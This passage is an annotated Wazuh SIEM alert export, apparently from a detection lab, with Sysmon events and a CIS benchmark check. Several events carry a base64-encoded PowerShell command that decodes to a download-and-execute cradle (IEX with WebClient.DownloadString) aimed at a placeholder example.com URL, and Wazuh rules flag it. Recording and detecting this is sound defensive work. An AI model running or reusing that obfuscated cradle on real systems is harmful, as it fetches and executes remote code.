data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:01.067
ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00}
ProcessId: 15132
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1iubx32l.gko.ps1
CreationUtcTime: 2025-04-24 22:38:01.067
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:01.067 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd47-680a-610b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1iubx32l.gko.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:01.067 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19013 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534284.1542337 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26157 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Detailed File Share' is set to include 'Failure'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 3.3,8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Detailed File Share"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Detailed File Share"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: failed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 64 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534290.1545402 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:07.6419042Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284255 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:02.808
ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00}
ProcessId: 10844
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd47-680a-610b-000000000e00}
ParentProcessId: 15132
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:02.808 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd4a-680a-660b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15132 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 68 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534290.1553473 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:07.8488294Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284256 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:07.834
ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00}
ProcessId: 10844
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wrzawqio.au1.ps1
CreationUtcTime: 2025-04-24 22:38:07.834
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:07.834 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd4a-680a-660b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wrzawqio.au1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:07.834 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 65 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534292.1556242 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:10.3560006Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284299 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:09.068
ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00}
ProcessId: 10148
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00}
ParentProcessId: 10844
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:09.068 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd51-680a-690b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 69 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534292.1564313 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:10.6058844Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284311 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:10.562
ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00}
ProcessId: 10148
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fabyeuej.msp.ps1
CreationUtcTime: 2025-04-24 22:38:10.562
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:10.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
